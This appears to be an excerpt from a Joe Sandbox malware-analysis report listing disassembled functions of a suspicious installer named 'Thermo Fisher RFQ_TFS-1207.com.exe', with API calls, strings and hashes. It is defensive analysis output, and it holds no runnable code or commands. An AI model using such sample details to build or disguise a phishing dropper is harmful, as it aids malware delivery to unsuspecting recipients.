Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: F@$Call$N
API String ID: 3103080414-3713480610
Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9

Function 0040619A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE

Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB

GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
wsprintfA.USER32 ref: 00406219
GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,?,007A55E8,?,?,?,?,?), ref: 00406254
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00406263
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
GlobalFree.KERNEL32(00000000), ref: 00406302
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406309

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

Strings

Mz, xrefs: 004061C3
Uz, xrefs: 004061F0
%ls=%ls, xrefs: 0040620F
Uz, xrefs: 004061F7
[Rename], xrefs: 00406283, 00406295

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
API String ID: 2171350718-3350566011
Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4

Function 00402FB8 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(00093BE4,?,00093BE8), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

;, xrefs: 00402FEC
verifying installer: %d%%, xrefs: 0040300B
;, xrefs: 00402FF2

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%$;$;
API String ID: 1451636040-142298927
Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58

Function 00406802 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406865
CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00406874
CharNextW.USER32(?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406879
CharPrevW.USER32(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 0040688C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 00406846
*?|<>/":, xrefs: 00406854

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1035651104
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD

Function 0040453A Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404557
GetSysColor.USER32(00000000), ref: 00404595
SetTextColor.GDI32(?,00000000), ref: 004045A1
SetBkMode.GDI32(?,?), ref: 004045AD
GetSysColor.USER32(?), ref: 004045C0
SetBkColor.GDI32(?,?), ref: 004045D0
DeleteObject.GDI32(?), ref: 004045EA
CreateBrushIndirect.GDI32(?), ref: 004045F4

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54

Function 00404E8E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
GetMessagePos.USER32 ref: 00404EB1
ScreenToClient.USER32(?,?), ref: 00404ECB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03

Strings

f, xrefs: 00404EDF

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4

Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E76
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
ReleaseDC.USER32(?,00000000), ref: 00401EA9
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8

Strings

Times New Roman, xrefs: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D

Function 6FE72655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6FE712BB: GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5

GlobalFree.KERNEL32(?), ref: 6FE72743
GlobalFree.KERNEL32(00000000), ref: 6FE72778

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 606b494d0cac7c91db66fa8b140d5b348d6aaf1c86f94eba65c1d05aed7ae852
Instruction ID: c5a24983d2a96090b2d2d0fa85f3a4256ab2f87eadf6e21cbe56b02a14282d14
Opcode Fuzzy Hash: 606b494d0cac7c91db66fa8b140d5b348d6aaf1c86f94eba65c1d05aed7ae852
Instruction Fuzzy Hash: B931AB31505611EFCB268FA8DAC4C2A7FF7FB97314720462EE10183260CB306826DF62

Function 004029A3 Relevance: 9.1, APIs: 6, Instructions: 77memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

GlobalAlloc.KERNEL32(?,?), ref: 004029D6

Part of subcall function 004034E7: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004029F2
GlobalFree.KERNEL32(?), ref: 00402A2B
GlobalFree.KERNEL32(00000000), ref: 00402A3E

Part of subcall function 004032D9: GetTickCount.KERNEL32 ref: 00403343
Part of subcall function 004032D9: GetTickCount.KERNEL32 ref: 004033C7
Part of subcall function 004032D9: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033F0
Part of subcall function 004032D9: wsprintfW.USER32 ref: 00403403

CloseHandle.KERNEL32(?,?,?), ref: 00402A5A
DeleteFileW.KERNEL32(?), ref: 00402A6D

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
String ID:
API String ID: 2082585436-0
Opcode ID: 39ffa233b977b71c875400693a81084305f2dbfc0f65c75d256c73d9bd221482
Instruction ID: ceca7db3f20ba128e09dabf3b87bd9784812185164ee1ab5f3c4a126dd6efce3
Opcode Fuzzy Hash: 39ffa233b977b71c875400693a81084305f2dbfc0f65c75d256c73d9bd221482
Instruction Fuzzy Hash: F6219C72D00118BFCF21AFA4DE888AEBE79FF48320B14422AF555762E0CB7948419F58

Function 6FE72480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FE725C2

Part of subcall function 6FE712CC: lstrcpynW.KERNEL32(00000000,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712DC

GlobalAlloc.KERNEL32(?), ref: 6FE72548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FE72563

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 1b448e51862cb264c8effdb6add5fd40a2462c8d9fe2e56795c7252a9e6a4a70
Instruction ID: 325dbcfd428cbadb3ae620cc18a1f3bac2621b360edc69fcddcb29e3a2fd60b9
Opcode Fuzzy Hash: 1b448e51862cb264c8effdb6add5fd40a2462c8d9fe2e56795c7252a9e6a4a70
Instruction Fuzzy Hash: 0841D1B0408706EFD734DF69D850A267FF9FBA6314F204A1EE54586280EF34A585CF62

Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
